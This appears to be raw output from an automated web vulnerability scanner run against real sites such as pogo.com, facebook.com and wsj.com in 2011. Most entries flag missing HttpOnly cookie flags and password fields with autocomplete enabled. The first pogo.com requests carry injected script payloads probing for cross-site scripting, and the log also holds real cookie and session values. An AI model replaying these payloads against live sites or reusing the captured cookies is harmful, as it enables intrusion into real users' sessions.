GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/lightregview.do Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536962788-New%7C1297128962788%3B
The following cookie was issued by the application and does not have the HttpOnly flag set:
rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xanga.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: fp-promo-count=1:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:44:13 GMT Connection: close Content-Length: 82140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://activity.livefaceonweb.com/default.aspx
The form contains the following password field with autocomplete enabled:
txtPass
Request
GET / HTTP/1.1 Host: activity.livefaceonweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Date: Sun, 09 Jan 2011 02:02:02 GMT Connection: close Content-Length: 2896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://diythemes.com/amember/login.php
The form contains the following password field with autocomplete enabled:
amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://mail.cmsinter.net/Login.aspx
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267; authCookie=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://themeforest.net/signin/authenticate
The form contains the following password field with autocomplete enabled:
password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /extend/plugins/wp-pagenavi/ HTTP/1.1 Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil ...[SNIP]... </h2>
The page contains a form with the following action URL:
http://www.43things.com/auth/login
The form contains the following password field with autocomplete enabled:
person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]... </div>
The page contains a form with the following action URL:
https://www.adbrite.com/mb/commerce/login.php
The form contains the following password field with autocomplete enabled:
pword
Request
GET /mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.adbrite.com/mb/commerce/login.php
The form contains the following password field with autocomplete enabled:
pword
Request
GET /mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL:
http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL:
http://www.facebook.com/?ref=sgm
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET /?ref=sgm HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=KEXAT; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:43 GMT Content-Length: 30059
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
The form contains the following password field with autocomplete enabled:
pass
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
The form contains the following password field with autocomplete enabled:
pass
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755
The form contains the following password field with autocomplete enabled:
pass
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
The form contains the following password field with autocomplete enabled:
pass
Request
GET /connect/uiserver.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:43 GMT Content-Length: 13442
The form contains the following password field with autocomplete enabled:
pass
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799
The page contains a form with the following action URL:
http://www.mlive.com/
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:45 GMT Date: Sun, 09 Jan 2011 01:44:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107391
The page contains a form with the following action URL:
http://www.onestat.com/Default.aspx
The form contains the following password field with autocomplete enabled:
